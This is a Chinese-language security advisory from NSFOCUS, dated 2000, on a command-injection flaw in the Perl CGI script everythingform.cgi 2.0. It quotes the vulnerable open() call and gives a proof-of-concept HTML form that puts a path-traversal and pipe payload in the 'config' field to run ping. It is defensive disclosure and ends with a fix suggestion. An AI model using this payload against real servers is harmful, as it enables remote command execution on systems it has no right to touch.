首页 -> 安全研究

安全研究

安全漏洞
everythingform.cgi可执行任意命令

发布日期:2000-12-14
更新日期:2000-12-14

受影响系统:

Leif M. Wright everythingform.cgi 2.0for unix
描述:

Leif M. Wright(http://www.conservatives.net/atheist/scripts/index.html?Download&everythingform)编写的everythingform.cgi是一个基于Perl的表单设计
工具,它对输入进行合法性检查时存在一个漏洞。

该脚本无法从用户提供的“config”域中正确滤除shell命令。如下:
..
$ConfigFile = $in{config};
..
open(CONFIG, "$configdir$ConfigFile") || &Error("I can\'t open $ConfigFile in
the ReadConfig subroutine. Reason: $!");


结果,该脚本可以以web服务器的权限执行任意命令。
  
<*来源:rpc (h@ckz.org) *>




测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


下面的例子将执行ping程序:

<form action="http://www.conservatives.net/someplace/everythingform.cgi" method=POST>
<h1>everythingform.cgi exploit</h1>
Command: <input type=text name=config value="../../../../../../../../bin/ping -c 5 http://www.foobar.com|>
<input type=hidden name=Name value="expletive deleted">
<input type=hidden name="e-mail" value="foo@bar.net">
<input type=hidden name=FavoriteColor value=Black>
<input type=submit value=run>
</form>



建议:

临时解决办法:

    NSFOCUS建议您自行修改该CGI脚本,增加对shell命令和元字符的过滤。

厂商补丁:

    暂无。


浏览次数:5723
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障